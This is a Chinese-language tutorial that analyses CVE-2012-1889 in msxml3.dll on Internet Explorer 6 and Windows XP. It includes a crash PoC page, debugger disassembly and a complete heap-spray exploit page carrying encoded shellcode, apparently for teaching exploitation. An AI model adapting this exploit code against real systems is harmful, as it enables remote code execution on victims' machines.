軟件名稱:Internet Explorer 軟件版本:6.0.2900.5512 漏洞模塊:msxml3.dll 模塊版本:8.90.1101.0 編譯日期:2008年4月14日 |
操作系統:Windows XP sp3 漏洞編號:CVE-2012-1889(MS12-043) 危害等級:超危 漏洞類型:緩衝區溢出 威脅類型:遠程 |
1. 軟件簡介
Internet Explorer,是微軟公司推出的一款網頁瀏覽器。原稱Microsoft Internet Explorer(6版本以前)和Windows Internet Explorer(7、8、9、10、11版本),簡稱IE。在IE7以前,中文直譯爲“網絡探路者”,但在IE7以後官方便直接俗稱"IE瀏覽器"。
msxml指微軟的xml語言解析器,用來解釋xml語言的。就好像html文本下載到本地,瀏覽器會檢查html的語法,解釋html文本然後顯示出來一樣。要使用xml文件就一定要用到xml parser。
2. 漏洞成因
Microsoft XML Core Services (MSXML)是一組服務,可用JScript、VBScript、Microsoft開發工具編寫的應用構建基於XML的Windows-native應用。
Microsoft XML Core Services 處理內存中的對象的方式中存在一個遠程執行代碼漏洞。如果用戶查看包含特製內容的網站,則該漏洞可能允許遠程執行代碼。Microsoft XML Core Services 3.0、4.0、5.0和6.0版本中存在漏洞,該漏洞源於訪問未初始化內存位置。
3. 利用過程
遠程攻擊者可利用該漏洞藉助特製的web站點,執行任意代碼或導致拒絕服務(內存破壞)。
4. PoC
使用以下代碼保存爲html文件,在windbg條件下打開IE瀏覽器,並運行這個html文件,IE瀏覽器崩潰。
示例代碼:
<html>
<head>
<title>CVE 2012-1889 PoC v2 By:15PB.Com</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
<script>
// 獲取名爲15PB的對象,並將其保存到名爲obj15PB實例中
var obj15PB = document.getElementById('15PB').object;
// 初始化數據變量srcImgPath的內容(unescape()是解碼函數)
var srcImgPath = unescape("\u0C0C\u0C0C");
// 構建一個長度爲0x1000[4096*2]字節的數據
while (srcImgPath.length < 0x1000)
srcImgPath += srcImgPath;
// 構建一個長度爲0x1000-10[4088*2]的數據,起始內容爲“\\15PB_Com”
srcImgPath = "\\\\15PB_Com" + srcImgPath;
srcImgPath = srcImgPath.substr(0, 0x1000-10);
// 創建一個圖片元素,並將圖片源路徑設爲srcImgPath
var emtPic = document.createElement("img");
emtPic.src = srcImgPath;
emtPic.nameProp; // 返回當前圖片文件名(載入路徑)
obj15PB.definition(0); // 定義對象(觸發溢出)
</script>
</body>
</html>
如下圖所示,斷在5dd8d75d這個mov ecx,dword ptr[eax],0c0c0c0c地址無法讀取。
截取關鍵地方就是這樣:
5dd8d751 8b45ec mov eax,dword ptr [ebp-14h]
5dd8d754 3bc3 cmp eax,ebx
5dd8d756 8bf0 mov esi,eax
5dd8d758 7426 je msxml3!DllUnregisterServer+0x9fc (5dd8d780)
5dd8d75a ff7528 push dword ptr [ebp+28h]
5dd8d75d 8b08 mov ecx,dword ptr [eax] ds:0023:0c0c0c0c=????
5dd8d75f ff7524 push dword ptr [ebp+24h]
5dd8d762 ff7520 push dword ptr [ebp+20h]
5dd8d765 57 push edi
5dd8d766 6a03 push 3
5dd8d768 ff7514 push dword ptr [ebp+14h]
5dd8d76b 68f8a7d85d push offset msxml3!DllGetClassObject+0x16fde (5dd8a7f8)
5dd8d770 53 push ebx
5dd8d771 50 push eax
5dd8d772 ff5118 call dword ptr [ecx+18h]
5. Exploit
如果要執行代碼,就需要修改EIP寄存器的內容,繼續往下看,來到call dword ptr [ecx+18h]處,這個地方剛好夠我們轉移EIP。如果0x0c0c0c0c處存在可讀的內存,那麼上面就不會出現Access violation的情況,同時,程序視圖跳轉到0x0c0c0c0c + 0x18 = 0x0C0C0C24處執行代碼,如果事先在這個地方安排好需要執行的代碼,那麼漏洞觸發後就會執行任意代碼了。
可以使用HeapSpray(堆噴射)將0x0C0C0C0C的地方植入Shellcode。
附:
在使用HeapSpray的時候,一般會將EIP指向堆區的0x0C0C0C0C位置,然後利用JavaScript申請大量堆內存,並用包含着滑板指令 0C0C(OR AL,0x0C)和ShellCode的“內存片”覆蓋這些內存。通常,JavaScript會從內存的低地址向高地址分配內存,因此申請的內存超過200MB(200MB = 200*1024*1024 = 0x0C800000 > 0x0C0C0C0C)後,0x0C0C0C0C將被含有ShellCode的內存片覆蓋。只要內存片中的滑板指令 0C0C能夠命中0x0C0C0C0C的位置,ShellCode就能最終得到執行。
示例代碼:
<html>
<head>
<title>CVE 2012-1889 PoC v3 By:15PB.Com</title>
</head>
<body>
<object classid="clsid:f6D90f11-9c73-11d3-b32e-00C04f990bb4" id='15PB'></object>
<script>
// 1. 準備好Shellcode(unescape()是解碼函數)
var cShellcode = unescape(
"\u8360\u20EC\u4CEB\u6547\u5074\u6F72\u4163\u6464" +
"\u6572\u7373\u6F4C\u6461\u694C\u7262\u7261\u4579" +
"\u4178\u5500\u6573\u3372\u2E32\u6C64\u006C\u654D" +
"\u7373\u6761\u4265\u786F\u0041\u7845\u7469\u7250" +
"\u636F\u7365\u0073\u6548\u6C6C\u206F\u3531\u4250" +
"\u0021\u00E8\u0000\u5B00\u8B64\u3035\u0000\u8B00" +
"\u0C76\u768B\u8B1C\u8B36\u0856\u5253\u12E8\u0000" +
"\u8B00\u8DF0\uBD4B\u5251\uD0FF\u5653\u5250\u6EE8" +
"\u0000\u5500\uEC8B\uEC83\u520C\u558B\u8B08\u3C72" +
"\u348D\u8B32\u7876\u348D\u8B32\u1C7E\u3C8D\u893A" +
"\uFC7D\u7E8B\u8D20\u3A3C\u7D89\u8BF8\u247E\u3C8D" +
"\u893A\uF47D\uC033\u01EB\u8B40\uF875\u348B\u8B86" +
"\u0855\u348D\u8B32\u0C5D\u7B8D\uB9AF\u000E\u0000" +
"\uF3FC\u75A6\u8BE3\uF475\uFF33\u8B66\u463C\u558B" +
"\u8BFC\uBA34\u558B\u8D08\u3204\u8B5A\u5DE5\u08C2" +
"\u5500\uEC8B\uEC83\u8B08\u145D\u4B8D\u6ACC\u6A00" +
"\u5100\u55FF\u8D0C\uD74B\u5051\u55FF\u8910\uFC45" +
"\u4B8D\u51E3\u75FF\uFF08\u1055\u4589\u8DF8\uEF4B" +
"\u006A\u5151\u006A\u55FF\u6AFC\uFF00\uF855\uE58B" +
"\uC25D\u0010\u0000");
// 2. 製作一塊滑板數據
// 2.1 計算填充滑板指令數據的大小(都除2是因爲length返回的是Unicode的字符個數)
var nSlideSize = 1024*1024 / 2; // 一個滑板指令區的大小(1MB)
var nMlcHadSize = 32 / 2; // 堆頭部大小
var nStrLenSize = 4 / 2; // 堆長度信息大小
var nTerminatorSize = 2 / 2; // 堆結尾符號大小
var nScSize = cShellcode.length; // Shellcode大小
var nFillSize = nSlideSize-nMlcHadSize-nStrLenSize-nScSize-nTerminatorSize;
// 2.2 填充滑板指令,製作好一塊填充數據
var cFillData = unescape("\u0C0C\u0C0C"); // 滑板指令 0C0C OR AL,0C
var cSlideData = new Array(); // 申請一個數組對象用於保存滑板數據
while (cFillData.length <= nSlideSize)
cFillData += cFillData;
cFillData = cFillData.substring(0, nFillSize);
// 3. 填充200MB的內存區域(申請200塊1MB大小的滑板數據區),試圖覆蓋0x0C0C0C0C
// 區域,每塊滑板數據均由 滑板數據+Shellcode 組成,這樣只要任意一塊滑板數據
// 正好落在0x0C0C0C0C處,大量無用的“OR AL,0C”就會將執行流程引到滑板數據區
// 後面的Shellcode處,進而執行Shellcode。
for (var i = 0; i < 200; i++)
cSlideData[i] = cFillData + cShellcode;
// 4. 觸發CVE 2012-1889漏洞
// 4.1 獲取名爲15PB的XML對象,並將其保存到名爲obj15PB實例中
var obj15PB = document.getElementById('15PB').object;
// 4.2 構建一個長度爲0x1000-10=8182,起始內容爲“\\15PB_Com”字節的數據
var srcImgPath = unescape("\u0C0C\u0C0C");
while (srcImgPath.length < 0x1000)
srcImgPath += srcImgPath;
srcImgPath = "\\\\15PB_Com" + srcImgPath;
srcImgPath = srcImgPath.substr(0, 0x1000-10);
// 4.3 創建一個圖片元素,並將圖片源路徑設爲srcImgPath,並返回當前圖片文件名
var emtPic = document.createElement("img");
emtPic.src = srcImgPath;
emtPic.nameProp;
// 4.4 定義對象obj15PB(觸發溢出)
obj15PB.definition(0);
</script>
</body>
</html>
總有一次可以到達shellcode
最終效果:
6. 結語
觸發漏洞的代碼是JavaScript中最後一句,即後面obj15PB.definition(0)。definition是DOM對象的一個屬性,而且是隻讀的屬性,不可以把屬性當作函數來使用並往裏面傳遞參數。